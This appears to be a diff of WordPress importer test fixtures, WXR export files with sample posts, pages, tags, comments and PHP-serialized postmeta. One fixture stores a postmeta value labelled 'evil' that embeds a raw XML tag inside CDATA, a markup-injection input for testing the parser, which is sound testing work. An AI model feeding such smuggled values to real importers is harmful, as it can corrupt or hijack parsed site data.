<link>http://localhost/?page_id=6</link>
<pubDate>Tue, 18 Jan 2011 07:46:09 +0000</pubDate>
<dc:creator>admin</dc:creator>
<guid isPermaLink="false">http://localhost/?page_id=6</guid>
<description></description>
<content:encoded><![CDATA[This parent page appears after its child in the export file.]]></content:encoded>
<excerpt:encoded><![CDATA[]]></excerpt:encoded>
<wp:post_id>6</wp:post_id>
<wp:post_date>2011-01-18 07:46:09</wp:post_date>
<wp:post_date_gmt>2011-01-18 07:46:09</wp:post_date_gmt>
<wp:comment_status>open</wp:comment_status>
<wp:ping_status>open</wp:ping_status>
<wp:post_name>parent-page</wp:post_name>
<wp:status>publish</wp:status>
<wp:post_parent>0</wp:post_parent>
<wp:menu_order>0</wp:menu_order>
<wp:post_type>page</wp:post_type>
<wp:post_password></wp:post_password>
<wp:is_sticky>0</wp:is_sticky>
<wp:postmeta>
<wp:meta_key>_edit_last</wp:meta_key>
<wp:meta_value><![CDATA[1]]></wp:meta_value>
</wp:postmeta>
<wp:postmeta>
<wp:meta_key>_wp_page_template</wp:meta_key>
<wp:meta_value><![CDATA[default]]></wp:meta_value>
</wp:postmeta>
</item>
<item>
<title>Draft Page</title>
<link>http://localhost/?page_id=9</link>
<pubDate>Wed, 30 Nov -0001 00:00:00 +0000</pubDate>
<dc:creator>admin</dc:creator>
<guid isPermaLink="false">http://localhost/?page_id=9</guid>
<description></description>
<content:encoded><![CDATA[This is a draft.]]></content:encoded>
<excerpt:encoded><![CDATA[]]></excerpt:encoded>
<wp:post_id>9</wp:post_id>
<wp:post_date>2011-01-18 07:46:29</wp:post_date>
<wp:post_date_gmt>0000-00-00 00:00:00</wp:post_date_gmt>
<wp:comment_status>open</wp:comment_status>
<wp:ping_status>open</wp:ping_status>
<wp:post_name></wp:post_name>
<wp:status>draft</wp:status>
<wp:post_parent>0</wp:post_parent>
<wp:menu_order>0</wp:menu_order>
<wp:post_type>page</wp:post_type>
<wp:post_password></wp:post_password>
<wp:is_sticky>0</wp:is_sticky>
<wp:postmeta>
<wp:meta_key>_edit_last</wp:meta_key>
<wp:meta_value><![CDATA[1]]></wp:meta_value>
</wp:postmeta>
<wp:postmeta>
<wp:meta_key>_wp_page_template</wp:meta_key>
<wp:meta_value><![CDATA[default]]></wp:meta_value>
</wp:postmeta>
</item>
<item>
<title>1-col page</title>
<link>http://localhost/?page_id=11</link>
<pubDate>Tue, 18 Jan 2011 07:46:57 +0000</pubDate>
<dc:creator>admin</dc:creator>
<guid isPermaLink="false">http://localhost/?page_id=11</guid>
<description></description>
<content:encoded><![CDATA[Using the "One column, no sidebar" template.]]></content:encoded>
<excerpt:encoded><![CDATA[]]></excerpt:encoded>
<wp:post_id>11</wp:post_id>
<wp:post_date>2011-01-18 07:46:57</wp:post_date>
<wp:post_date_gmt>2011-01-18 07:46:57</wp:post_date_gmt>
<wp:comment_status>open</wp:comment_status>
<wp:ping_status>open</wp:ping_status>
<wp:post_name>1-col-page</wp:post_name>
<wp:status>publish</wp:status>
<wp:post_parent>0</wp:post_parent>
<wp:menu_order>0</wp:menu_order>
<wp:post_type>page</wp:post_type>
<wp:post_password></wp:post_password>
<wp:is_sticky>0</wp:is_sticky>
<wp:postmeta>
<wp:meta_key>_edit_last</wp:meta_key>
<wp:meta_value><![CDATA[1]]></wp:meta_value>
</wp:postmeta>
<wp:postmeta>
<wp:meta_key>_wp_page_template</wp:meta_key>
<wp:meta_value><![CDATA[onecolumn-page.php]]></wp:meta_value>
</wp:postmeta>
</item>
<item>
<title>Private Post</title>
<link>http://localhost/?p=13</link>
<pubDate>Tue, 18 Jan 2011 07:47:19 +0000</pubDate>
<dc:creator>admin</dc:creator>
<guid isPermaLink="false">http://localhost/?p=13</guid>
<description></description>
<content:encoded><![CDATA[Tagged with some tags.]]></content:encoded>
<excerpt:encoded><![CDATA[]]></excerpt:encoded>
<wp:post_id>13</wp:post_id>
<wp:post_date>2011-01-18 07:47:19</wp:post_date>
<wp:post_date_gmt>2011-01-18 07:47:19</wp:post_date_gmt>
<wp:comment_status>open</wp:comment_status>
<wp:ping_status>open</wp:ping_status>
<wp:post_name>private-post</wp:post_name>
<wp:status>private</wp:status>
<wp:post_parent>0</wp:post_parent>
<wp:menu_order>0</wp:menu_order>
<wp:post_type>post</wp:post_type>
<wp:post_password></wp:post_password>
<wp:is_sticky>0</wp:is_sticky>
<category domain="post_tag" nicename="tag1"><![CDATA[Tag1]]></category>
<category domain="post_tag" nicename="tag2"><![CDATA[Tag2]]></category>
<category domain="post_tag" nicename="tag3"><![CDATA[Tag3]]></category>
<category domain="category" nicename="uncategorized"><![CDATA[Uncategorized]]></category>
<wp:postmeta>
<wp:meta_key>_edit_last</wp:meta_key>
<wp:meta_value><![CDATA[1]]></wp:meta_value>
</wp:postmeta>
</item>
<item>
<title>Foo-child</title>
<link>http://localhost/?p=15</link>
<pubDate>Tue, 18 Jan 2011 07:48:07 +0000</pubDate>
<dc:creator>editor</dc:creator>
<guid isPermaLink="false">http://localhost/?p=15</guid>
<description></description>
<content:encoded><![CDATA[Post associated with the Foo category that is a child of Bar.]]></content:encoded>
<excerpt:encoded><![CDATA[]]></excerpt:encoded>
<wp:post_id>15</wp:post_id>
<wp:post_date>2011-01-18 07:48:07</wp:post_date>
<wp:post_date_gmt>2011-01-18 07:48:07</wp:post_date_gmt>
<wp:comment_status>open</wp:comment_status>
<wp:ping_status>open</wp:ping_status>
<wp:post_name>foo-child</wp:post_name>
<wp:status>publish</wp:status>
<wp:post_parent>0</wp:post_parent>
<wp:menu_order>0</wp:menu_order>
<wp:post_type>post</wp:post_type>
<wp:post_password></wp:post_password>
<wp:is_sticky>0</wp:is_sticky>
<category domain="category" nicename="foo-bar"><![CDATA[Foo]]></category>
<wp:postmeta>
<wp:meta_key>_edit_last</wp:meta_key>
<wp:meta_value><![CDATA[1]]></wp:meta_value>
</wp:postmeta>
<wp:postmeta>
<wp:meta_key>Post by</wp:meta_key>
<wp:meta_value><![CDATA[editor]]></wp:meta_value>
</wp:postmeta>
</item>
<item>
<title>Top-level Foo</title>
<link>http://localhost/?p=17</link>
<pubDate>Tue, 18 Jan 2011 07:48:32 +0000</pubDate>
<dc:creator>admin</dc:creator>
<guid isPermaLink="false">http://localhost/?p=17</guid>
<description></description>
<content:encoded><![CDATA[Post associated with the top-level Foo category.]]></content:encoded>
<excerpt:encoded><![CDATA[]]></excerpt:encoded>
<wp:post_id>17</wp:post_id>
<wp:post_date>2011-01-18 07:48:32</wp:post_date>
<wp:post_date_gmt>2011-01-18 07:48:32</wp:post_date_gmt>
<wp:comment_status>open</wp:comment_status>
<wp:ping_status>open</wp:ping_status>
<wp:post_name>top-level-foo</wp:post_name>
<wp:status>publish</wp:status>
<wp:post_parent>0</wp:post_parent>
<wp:menu_order>0</wp:menu_order>
<wp:post_type>post</wp:post_type>
<wp:post_password></wp:post_password>
<wp:is_sticky>0</wp:is_sticky>
<category domain="category" nicename="foo"><![CDATA[Foo]]></category>
<wp:postmeta>
<wp:meta_key>_edit_last</wp:meta_key>
<wp:meta_value><![CDATA[1]]></wp:meta_value>
</wp:postmeta>
</item>
<item>
<title>Non-standard post format</title>
<link>http://localhost/?p=19</link>
<pubDate>Tue, 18 Jan 2011 07:48:52 +0000</pubDate>
<dc:creator>admin</dc:creator>
<guid isPermaLink="false">http://localhost/?p=19</guid>
<description></description>
<content:encoded><![CDATA[This is an aside.]]></content:encoded>
<excerpt:encoded><![CDATA[]]></excerpt:encoded>
<wp:post_id>19</wp:post_id>
<wp:post_date>2011-01-18 07:48:52</wp:post_date>
<wp:post_date_gmt>2011-01-18 07:48:52</wp:post_date_gmt>
<wp:comment_status>open</wp:comment_status>
<wp:ping_status>open</wp:ping_status>
<wp:post_name>non-standard-post-format</wp:post_name>
<wp:status>publish</wp:status>
<wp:post_parent>0</wp:post_parent>
<wp:menu_order>0</wp:menu_order>
<wp:post_type>post</wp:post_type>
<wp:post_password></wp:post_password>
<wp:is_sticky>0</wp:is_sticky>
<category domain="post_format" nicename="post-format-aside"><![CDATA[Aside]]></category>
<category domain="category" nicename="uncategorized"><![CDATA[Uncategorized]]></category>
<wp:postmeta>
<wp:meta_key>_edit_last</wp:meta_key>
<wp:meta_value><![CDATA[1]]></wp:meta_value>
</wp:postmeta>
</item>
<item>
<title>Many Categories</title>
<link>http://localhost/?p=22</link>
<pubDate>Tue, 18 Jan 2011 07:55:01 +0000</pubDate>
<dc:creator>admin</dc:creator>
<guid isPermaLink="false">http://localhost/?p=22</guid>
<description></description>
<content:encoded><![CDATA[This post has a lot of categories.]]></content:encoded>
<excerpt:encoded><![CDATA[]]></excerpt:encoded>
<wp:post_id>22</wp:post_id>
<wp:post_date>2011-01-18 07:55:01</wp:post_date>
<wp:post_date_gmt>2011-01-18 07:55:01</wp:post_date_gmt>
<wp:comment_status>open</wp:comment_status>
<wp:ping_status>open</wp:ping_status>
<wp:post_name>many-categories</wp:post_name>
<wp:status>publish</wp:status>
<wp:post_parent>0</wp:post_parent>
<wp:menu_order>0</wp:menu_order>
<wp:post_type>post</wp:post_type>
<wp:post_password></wp:post_password>
<wp:is_sticky>0</wp:is_sticky>
<category domain="category" nicename="alpha"><![CDATA[alpha]]></category>
<category domain="category" nicename="bar"><![CDATA[Bar]]></category>
<category domain="category" nicename="beta"><![CDATA[BETA]]></category>
<category domain="category" nicename="chi"><![CDATA[CHI]]></category>
<category domain="category" nicename="delta"><![CDATA[dElta]]></category>
<category domain="category" nicename="epsilon"><![CDATA[epsilon]]></category>
<category domain="category" nicename="eta"><![CDATA[eta]]></category>
<category domain="category" nicename="foo"><![CDATA[Foo]]></category>
<category domain="category" nicename="gamma"><![CDATA[gaMMA]]></category>
<category domain="category" nicename="iota"><![CDATA[IOTA]]></category>
<category domain="category" nicename="kappa"><![CDATA[Kappa]]></category>
<category domain="category" nicename="lambda"><![CDATA[lambda]]></category>
<category domain="category" nicename="mu"><![CDATA[MU]]></category>
<category domain="category" nicename="nu"><![CDATA[Nu]]></category>
<category domain="category" nicename="omega"><![CDATA[Omega]]></category>
<category domain="category" nicename="omicron"><![CDATA[Omicron]]></category>
<category domain="category" nicename="phi"><![CDATA[Phi]]></category>
<category domain="category" nicename="pi"><![CDATA[Pi]]></category>
<category domain="category" nicename="psi"><![CDATA[Psi]]></category>
<category domain="category" nicename="rho"><![CDATA[Rho]]></category>
<category domain="category" nicename="sigma"><![CDATA[Sigma]]></category>
<category domain="category" nicename="tau"><![CDATA[tAu]]></category>
<category domain="category" nicename="theta"><![CDATA[THeta]]></category>
<category domain="category" nicename="upsilon"><![CDATA[uPsIlOn]]></category>
<category domain="category" nicename="xi"><![CDATA[Xi]]></category>
<category domain="category" nicename="zeta"><![CDATA[zeta]]></category>
<category domain="category" nicename="eternity"><![CDATA[远征手记]]></category>
<wp:postmeta>
<wp:meta_key>_edit_last</wp:meta_key>
<wp:meta_value><![CDATA[1]]></wp:meta_value>
</wp:postmeta>
</item>
</channel>
</rss>

69
tests/data/export/test-serialized-postmeta-no-cdata.xml Normal file
View File

@ -0,0 +1,69 @@
<?xml version="1.0" encoding="UTF-8"?>
<!-- This is a WordPress eXtended RSS file generated by WordPress as an export of your blog. -->
<!-- It contains information about your blog's posts, comments, and categories. -->
<!-- You may use this file to transfer that content from one site to another. -->
<!-- This file is not intended to serve as a complete backup of your blog. -->
<!-- To import this information into a WordPress blog follow these steps. -->
<!-- 1. Log into that blog as an administrator. -->
<!-- 2. Go to Tools: Import in the blog's admin panels (or Manage: Import in older versions of WordPress). -->
<!-- 3. Choose "WordPress" from the list. -->
<!-- 4. Upload this file using the form provided on that page. -->
<!-- 5. You will first be asked to map the authors in this export file to users -->
<!-- on the blog. For each author, you may choose to map to an -->
<!-- existing user on the blog or to create a new user -->
<!-- 6. WordPress will then import each of the posts, comments, and categories -->
<!-- contained in this file into your blog -->
<!-- generator="WordPress/2.8.4" created="2009-12-04 09:06"-->
<rss version="2.0"
xmlns:excerpt="http://wordpress.org/export/1.0/excerpt/"
xmlns:content="http://purl.org/rss/1.0/modules/content/"
xmlns:wfw="http://wellformedweb.org/CommentAPI/"
xmlns:dc="http://purl.org/dc/elements/1.1/"
xmlns:wp="http://wordpress.org/export/1.0/"
>
<channel>
<title>Test With Serialized Postmeta</title>
<link>http://test.wordpress.org/</link>
<description>Just another blog</description>
<pubDate>Mon, 30 Nov 2009 21:35:27 +0000</pubDate>
<generator>http://wordpress.org/?v=2.8.4</generator>
<language>en</language>
<wp:wxr_version>1.0</wp:wxr_version>
<wp:base_site_url>http://test.wordpress.org/</wp:base_site_url>
<wp:base_blog_url>http://test.wordpress.org/</wp:base_blog_url>
<item>
<title>My Entry with Postmeta</title>
<link>http://test.wordpress.org/postemta</link>
<pubDate>Tue, 30 Nov 1999 00:00:00 +0000</pubDate>
<dc:creator><![CDATA[johncoswell]]></dc:creator>
<category><![CDATA[Uncategorized]]></category>
<category domain="category" nicename="uncategorized"><![CDATA[Uncategorized]]></category>
<guid isPermaLink="false">http://test.wordpress.org/postmeta</guid>
<description></description>
<content:encoded><![CDATA[This is my content]]></content:encoded>
<excerpt:encoded><![CDATA[]]></excerpt:encoded>
<wp:post_id>122</wp:post_id>
<wp:post_date>2009-10-20 16:13:20</wp:post_date>
<wp:post_date_gmt>0000-00-00 00:00:00</wp:post_date_gmt>
<wp:comment_status>open</wp:comment_status>
<wp:ping_status>open</wp:ping_status>
<wp:post_name></wp:post_name>
<wp:status>draft</wp:status>
<wp:post_parent>0</wp:post_parent>
<wp:menu_order>0</wp:menu_order>
<wp:post_type>post</wp:post_type>
<wp:post_password></wp:post_password>
<wp:postmeta>
<wp:meta_key>post-options</wp:meta_key>
<wp:meta_value>a:2:{s:18:"special_post_title";s:15:"A special title";s:11:"is_calendar";s:0:"";}</wp:meta_value>
</wp:postmeta>
</item>
</channel>
</rss>

77
tests/data/export/test-serialized-postmeta-with-cdata.xml Normal file
View File

@ -0,0 +1,77 @@
<?xml version="1.0" encoding="UTF-8"?>
<!-- This is a WordPress eXtended RSS file generated by WordPress as an export of your blog. -->
<!-- It contains information about your blog's posts, comments, and categories. -->
<!-- You may use this file to transfer that content from one site to another. -->
<!-- This file is not intended to serve as a complete backup of your blog. -->
<!-- To import this information into a WordPress blog follow these steps. -->
<!-- 1. Log into that blog as an administrator. -->
<!-- 2. Go to Tools: Import in the blog's admin panels (or Manage: Import in older versions of WordPress). -->
<!-- 3. Choose "WordPress" from the list. -->
<!-- 4. Upload this file using the form provided on that page. -->
<!-- 5. You will first be asked to map the authors in this export file to users -->
<!-- on the blog. For each author, you may choose to map to an -->
<!-- existing user on the blog or to create a new user -->
<!-- 6. WordPress will then import each of the posts, comments, and categories -->
<!-- contained in this file into your blog -->
<!-- generator="WordPress/2.8.4" created="2009-12-04 09:06"-->
<rss version="2.0"
xmlns:excerpt="http://wordpress.org/export/1.0/excerpt/"
xmlns:content="http://purl.org/rss/1.0/modules/content/"
xmlns:wfw="http://wellformedweb.org/CommentAPI/"
xmlns:dc="http://purl.org/dc/elements/1.1/"
xmlns:wp="http://wordpress.org/export/1.0/"
>
<channel>
<title>Test With Serialized Postmeta</title>
<link>http://test.wordpress.org/</link>
<description>Just another blog</description>
<pubDate>Mon, 30 Nov 2009 21:35:27 +0000</pubDate>
<generator>http://wordpress.org/?v=2.8.4</generator>
<language>en</language>
<wp:wxr_version>1.0</wp:wxr_version>
<wp:base_site_url>http://test.wordpress.org/</wp:base_site_url>
<wp:base_blog_url>http://test.wordpress.org/</wp:base_blog_url>
<item>
<title>My Entry with Postmeta</title>
<link>http://test.wordpress.org/postemta</link>
<pubDate>Tue, 30 Nov 1999 00:00:00 +0000</pubDate>
<dc:creator><![CDATA[johncoswell]]></dc:creator>
<category><![CDATA[Uncategorized]]></category>
<category domain="category" nicename="uncategorized"><![CDATA[Uncategorized]]></category>
<guid isPermaLink="false">http://test.wordpress.org/postmeta</guid>
<description></description>
<content:encoded><![CDATA[This is my content]]></content:encoded>
<excerpt:encoded><![CDATA[]]></excerpt:encoded>
<wp:post_id>10</wp:post_id>
<wp:post_date>2009-10-20 16:13:20</wp:post_date>
<wp:post_date_gmt>0000-00-00 00:00:00</wp:post_date_gmt>
<wp:comment_status>open</wp:comment_status>
<wp:ping_status>open</wp:ping_status>
<wp:post_name></wp:post_name>
<wp:status>draft</wp:status>
<wp:post_parent>0</wp:post_parent>
<wp:menu_order>0</wp:menu_order>
<wp:post_type>post</wp:post_type>
<wp:post_password></wp:post_password>
<wp:postmeta>
<wp:meta_key>post-options</wp:meta_key>
<wp:meta_value><![CDATA[a:2:{s:18:"special_post_title";s:15:"A special title";s:11:"is_calendar";s:0:"";}]]></wp:meta_value>
</wp:postmeta>
<wp:postmeta>
<wp:meta_key>contains-html</wp:meta_key>
<wp:meta_value><![CDATA[<pre>some html</pre>]]></wp:meta_value>
</wp:postmeta>
<wp:postmeta>
<wp:meta_key>evil</wp:meta_key>
<wp:meta_value><![CDATA[<wp:meta_value>evil</wp:meta_value>]]></wp:meta_value>
</wp:postmeta>
</item>
</channel>
</rss>

69
tests/data/export/test-utw-post-meta-import.xml Normal file
View File

@ -0,0 +1,69 @@
<?xml version="1.0" encoding="UTF-8"?>
<!-- This is a WordPress eXtended RSS file generated by WordPress as an export of your blog. -->
<!-- It contains information about your blog's posts, comments, and categories. -->
<!-- You may use this file to transfer that content from one site to another. -->
<!-- This file is not intended to serve as a complete backup of your blog. -->
<!-- To import this information into a WordPress blog follow these steps. -->
<!-- 1. Log into that blog as an administrator. -->
<!-- 2. Go to Tools: Import in the blog's admin panels (or Manage: Import in older versions of WordPress). -->
<!-- 3. Choose "WordPress" from the list. -->
<!-- 4. Upload this file using the form provided on that page. -->
<!-- 5. You will first be asked to map the authors in this export file to users -->
<!-- on the blog. For each author, you may choose to map to an -->
<!-- existing user on the blog or to create a new user -->
<!-- 6. WordPress will then import each of the posts, comments, and categories -->
<!-- contained in this file into your blog -->
<!-- generator="WordPress/2.8.4" created="2009-12-04 09:06"-->
<rss version="2.0"
xmlns:excerpt="http://wordpress.org/export/1.0/excerpt/"
xmlns:content="http://purl.org/rss/1.0/modules/content/"
xmlns:wfw="http://wellformedweb.org/CommentAPI/"
xmlns:dc="http://purl.org/dc/elements/1.1/"
xmlns:wp="http://wordpress.org/export/1.0/"
>
<channel>
<title>Test With Serialized Postmeta</title>
<link>http://test.wordpress.org/</link>
<description>Just another blog</description>
<pubDate>Mon, 30 Nov 2009 21:35:27 +0000</pubDate>
<generator>http://wordpress.org/?v=2.8.4</generator>
<language>en</language>
<wp:wxr_version>1.0</wp:wxr_version>
<wp:base_site_url>http://test.wordpress.org/</wp:base_site_url>
<wp:base_blog_url>http://test.wordpress.org/</wp:base_blog_url>
<item>
<title>My Entry with UTW Postmeta</title>
<link>http://test.wordpress.org/postmeta-utw</link>
<pubDate>Tue, 30 Nov 1999 00:00:00 +0000</pubDate>
<dc:creator><![CDATA[johncoswell]]></dc:creator>
<category><![CDATA[Uncategorized]]></category>
<category domain="category" nicename="uncategorized"><![CDATA[Uncategorized]]></category>
<guid isPermaLink="false">http://test.wordpress.org/postmeta-utw</guid>
<description></description>
<content:encoded><![CDATA[This is my content]]></content:encoded>
<excerpt:encoded><![CDATA[]]></excerpt:encoded>
<wp:post_id>150</wp:post_id>
<wp:post_date>2009-10-20 16:13:20</wp:post_date>
<wp:post_date_gmt>0000-00-00 00:00:00</wp:post_date_gmt>
<wp:comment_status>open</wp:comment_status>
<wp:ping_status>open</wp:ping_status>
<wp:post_name></wp:post_name>
<wp:status>draft</wp:status>
<wp:post_parent>0</wp:post_parent>
<wp:menu_order>0</wp:menu_order>
<wp:post_type>post</wp:post_type>
<wp:post_password></wp:post_password>
<wp:postmeta>
<wp:meta_key>test</wp:meta_key>
<wp:meta_value>a:13:{i:0;O:8:"stdClass":1:{s:3:"tag";s:5:"album";}i:1;O:8:"stdClass":1:{s:3:"tag";s:5:"apple";}i:2;O:8:"stdClass":1:{s:3:"tag";s:3:"art";}i:3;O:8:"stdClass":1:{s:3:"tag";s:7:"artwork";}i:4;O:8:"stdClass":1:{s:3:"tag";s:11:"dead-tracks";}i:5;O:8:"stdClass":1:{s:3:"tag";s:4:"ipod";}i:6;O:8:"stdClass":1:{s:3:"tag";s:6:"itunes";}i:7;O:8:"stdClass":1:{s:3:"tag";s:10:"javascript";}i:8;O:8:"stdClass":1:{s:3:"tag";s:6:"lyrics";}i:9;O:8:"stdClass":1:{s:3:"tag";s:6:"script";}i:10;O:8:"stdClass":1:{s:3:"tag";s:6:"tracks";}i:11;O:8:"stdClass":1:{s:3:"tag";s:22:"windows-scripting-host";}i:12;O:8:"stdClass":1:{s:3:"tag";s:7:"wscript";}}</wp:meta_value>
</wp:postmeta>
</item>
</channel>
</rss>

282
tests/data/export/valid-wxr-1.0.xml Normal file
View File

@ -0,0 +1,282 @@
<?xml version="1.0" encoding="UTF-8"?>
<!-- This is a WordPress eXtended RSS file generated by WordPress as an export of your blog. -->
<!-- It contains information about your blog's posts, comments, and categories. -->
<!-- You may use this file to transfer that content from one site to another. -->
<!-- This file is not intended to serve as a complete backup of your blog. -->
<!-- To import this information into a WordPress blog follow these steps. -->
<!-- 1. Log in to that blog as an administrator. -->
<!-- 2. Go to Tools: Import in the blog's admin panels (or Manage: Import in older versions of WordPress). -->
<!-- 3. Choose "WordPress" from the list. -->
<!-- 4. Upload this file using the form provided on that page. -->
<!-- 5. You will first be asked to map the authors in this export file to users -->
<!-- on the blog. For each author, you may choose to map to an -->
<!-- existing user on the blog or to create a new user -->
<!-- 6. WordPress will then import each of the posts, comments, and categories -->
<!-- contained in this file into your blog -->
<!-- generator="WordPress/3.0.1" created="2010-10-20 14:22"-->
<rss version="2.0"
xmlns:excerpt="http://wordpress.org/export/1.0/excerpt/"
xmlns:content="http://purl.org/rss/1.0/modules/content/"
xmlns:wfw="http://wellformedweb.org/CommentAPI/"
xmlns:dc="http://purl.org/dc/elements/1.1/"
xmlns:wp="http://wordpress.org/export/1.0/"
>
<channel>
<title>Export Dataset</title>
<link>http://localhost/</link>
<description>Just another WordPress site</description>
<pubDate>Wed, 20 Oct 2010 14:10:09 +0000</pubDate>
<generator>http://wordpress.org/?v=3.0.1</generator>
<language>en</language>
<wp:wxr_version>1.0</wp:wxr_version>
<wp:base_site_url>http://localhost/</wp:base_site_url>
<wp:base_blog_url>http://localhost/</wp:base_blog_url>
<wp:category><wp:category_nicename>alpha</wp:category_nicename><wp:category_parent></wp:category_parent><wp:cat_name><![CDATA[alpha]]></wp:cat_name><wp:category_description><![CDATA[The alpha category]]></wp:category_description></wp:category>
<wp:category><wp:category_nicename>beta</wp:category_nicename><wp:category_parent></wp:category_parent><wp:cat_name><![CDATA[beta]]></wp:cat_name></wp:category>
<wp:category><wp:category_nicename>parent</wp:category_nicename><wp:category_parent></wp:category_parent><wp:cat_name><![CDATA[parent]]></wp:cat_name></wp:category>
<wp:category><wp:category_nicename>uncategorized</wp:category_nicename><wp:category_parent></wp:category_parent><wp:cat_name><![CDATA[Uncategorized]]></wp:cat_name></wp:category>
<wp:category><wp:category_nicename>child</wp:category_nicename><wp:category_parent>parent</wp:category_parent><wp:cat_name><![CDATA[child]]></wp:cat_name></wp:category>
<wp:tag><wp:tag_slug>chicken</wp:tag_slug><wp:tag_name><![CDATA[chicken]]></wp:tag_name></wp:tag>
<wp:tag><wp:tag_slug>face</wp:tag_slug><wp:tag_name><![CDATA[face]]></wp:tag_name></wp:tag>
<wp:tag><wp:tag_slug>news</wp:tag_slug><wp:tag_name><![CDATA[news]]></wp:tag_name></wp:tag>
<wp:tag><wp:tag_slug>roar</wp:tag_slug><wp:tag_name><![CDATA[roar]]></wp:tag_name></wp:tag>
<generator>http://wordpress.org/?v=3.0.1</generator>
<item>
<title>Hello world!</title>
<link>http://localhost/?p=1</link>
<pubDate>Wed, 20 Oct 2010 14:08:20 +0000</pubDate>
<dc:creator><![CDATA[admin]]></dc:creator>
<category><![CDATA[Uncategorized]]></category>
<category domain="category" nicename="uncategorized"><![CDATA[Uncategorized]]></category>
<guid isPermaLink="false">http://localhost/?p=1</guid>
<description></description>
<content:encoded><![CDATA[Welcome to WordPress. This is your first post. Edit or delete it, then start blogging!]]></content:encoded>
<excerpt:encoded><![CDATA[]]></excerpt:encoded>
<wp:post_id>1</wp:post_id>
<wp:post_date>2010-10-20 14:08:20</wp:post_date>
<wp:post_date_gmt>2010-10-20 14:08:20</wp:post_date_gmt>
<wp:comment_status>open</wp:comment_status>
<wp:ping_status>open</wp:ping_status>
<wp:post_name>hello-world</wp:post_name>
<wp:status>publish</wp:status>
<wp:post_parent>0</wp:post_parent>
<wp:menu_order>0</wp:menu_order>
<wp:post_type>post</wp:post_type>
<wp:post_password></wp:post_password>
<wp:is_sticky>0</wp:is_sticky>
<wp:comment>
<wp:comment_id>1</wp:comment_id>
<wp:comment_author><![CDATA[Mr WordPress]]></wp:comment_author>
<wp:comment_author_email></wp:comment_author_email>
<wp:comment_author_url>http://wordpress.org/</wp:comment_author_url>
<wp:comment_author_IP></wp:comment_author_IP>
<wp:comment_date>2010-10-20 14:08:20</wp:comment_date>
<wp:comment_date_gmt>2010-10-20 14:08:20</wp:comment_date_gmt>
<wp:comment_content><![CDATA[Hi, this is a comment.<br />To delete a comment, just log in and view the post&#039;s comments. There you will have the option to edit or delete them.]]></wp:comment_content>
<wp:comment_approved>1</wp:comment_approved>
<wp:comment_type></wp:comment_type>
<wp:comment_parent>0</wp:comment_parent>
<wp:comment_user_id>0</wp:comment_user_id>
</wp:comment>
</item>
<item>
<title>About</title>
<link>http://localhost/?page_id=2</link>
<pubDate>Wed, 20 Oct 2010 14:08:20 +0000</pubDate>
<dc:creator><![CDATA[admin]]></dc:creator>
<guid isPermaLink="false">http://localhost/?page_id=2</guid>
<description></description>
<content:encoded><![CDATA[This is an example of a WordPress page, you could edit this to put information about yourself or your site so readers know where you are coming from. You can create as many pages like this one or sub-pages as you like and manage all of your content inside of WordPress.]]></content:encoded>
<excerpt:encoded><![CDATA[]]></excerpt:encoded>
<wp:post_id>2</wp:post_id>
<wp:post_date>2010-10-20 14:08:20</wp:post_date>
<wp:post_date_gmt>2010-10-20 14:08:20</wp:post_date_gmt>
<wp:comment_status>open</wp:comment_status>
<wp:ping_status>open</wp:ping_status>
<wp:post_name>about</wp:post_name>
<wp:status>publish</wp:status>
<wp:post_parent>0</wp:post_parent>
<wp:menu_order>0</wp:menu_order>
<wp:post_type>page</wp:post_type>
<wp:post_password></wp:post_password>
<wp:is_sticky>0</wp:is_sticky>
<wp:postmeta>
<wp:meta_key>_wp_page_template</wp:meta_key>
<wp:meta_value><![CDATA[default]]></wp:meta_value>
</wp:postmeta>
</item>
<item>
<title>Alpha post</title>
<link>http://localhost/?p=4</link>
<pubDate>Wed, 20 Oct 2010 14:09:37 +0000</pubDate>
<dc:creator><![CDATA[admin]]></dc:creator>
<category><![CDATA[alpha]]></category>
<category domain="category" nicename="alpha"><![CDATA[alpha]]></category>
<category domain="tag"><![CDATA[news]]></category>
<category domain="tag" nicename="news"><![CDATA[news]]></category>
<category domain="tag"><![CDATA[roar]]></category>
<category domain="tag" nicename="roar"><![CDATA[roar]]></category>
<guid isPermaLink="false">http://localhost/?p=4</guid>
<description></description>
<content:encoded><![CDATA[Tagged in roar, news]]></content:encoded>
<excerpt:encoded><![CDATA[]]></excerpt:encoded>
<wp:post_id>4</wp:post_id>
<wp:post_date>2010-10-20 14:09:37</wp:post_date>
<wp:post_date_gmt>2010-10-20 14:09:37</wp:post_date_gmt>
<wp:comment_status>open</wp:comment_status>
<wp:ping_status>open</wp:ping_status>
<wp:post_name>alpha-post</wp:post_name>
<wp:status>publish</wp:status>
<wp:post_parent>0</wp:post_parent>
<wp:menu_order>0</wp:menu_order>
<wp:post_type>post</wp:post_type>
<wp:post_password></wp:post_password>
<wp:is_sticky>0</wp:is_sticky>
<wp:postmeta>
<wp:meta_key>_edit_last</wp:meta_key>
<wp:meta_value><![CDATA[1]]></wp:meta_value>
</wp:postmeta>
<wp:postmeta>
<wp:meta_key>_edit_lock</wp:meta_key>
<wp:meta_value><![CDATA[1287583778]]></wp:meta_value>
</wp:postmeta>
<wp:postmeta>
<wp:meta_key>_wp_old_slug</wp:meta_key>
<wp:meta_value><![CDATA[]]></wp:meta_value>
</wp:postmeta>
</item>
<item>
<title>Child post</title>
<link>http://localhost/?p=6</link>
<pubDate>Wed, 20 Oct 2010 14:10:09 +0000</pubDate>
<dc:creator><![CDATA[admin]]></dc:creator>
<category domain="tag"><![CDATA[chicken]]></category>
<category domain="tag" nicename="chicken"><![CDATA[chicken]]></category>
<category><![CDATA[child]]></category>
<category domain="category" nicename="child"><![CDATA[child]]></category>
<category domain="tag"><![CDATA[face]]></category>
<category domain="tag" nicename="face"><![CDATA[face]]></category>
<guid isPermaLink="false">http://localhost/?p=6</guid>
<description></description>
<content:encoded><![CDATA[Tagged in face, chicken]]></content:encoded>
<excerpt:encoded><![CDATA[]]></excerpt:encoded>
<wp:post_id>6</wp:post_id>
<wp:post_date>2010-10-20 14:10:09</wp:post_date>
<wp:post_date_gmt>2010-10-20 14:10:09</wp:post_date_gmt>
<wp:comment_status>open</wp:comment_status>
<wp:ping_status>open</wp:ping_status>
<wp:post_name>child-post</wp:post_name>
<wp:status>publish</wp:status>
<wp:post_parent>0</wp:post_parent>
<wp:menu_order>0</wp:menu_order>
<wp:post_type>post</wp:post_type>
<wp:post_password></wp:post_password>
<wp:is_sticky>0</wp:is_sticky>
<wp:postmeta>
<wp:meta_key>_edit_last</wp:meta_key>
<wp:meta_value><![CDATA[1]]></wp:meta_value>
</wp:postmeta>
<wp:postmeta>
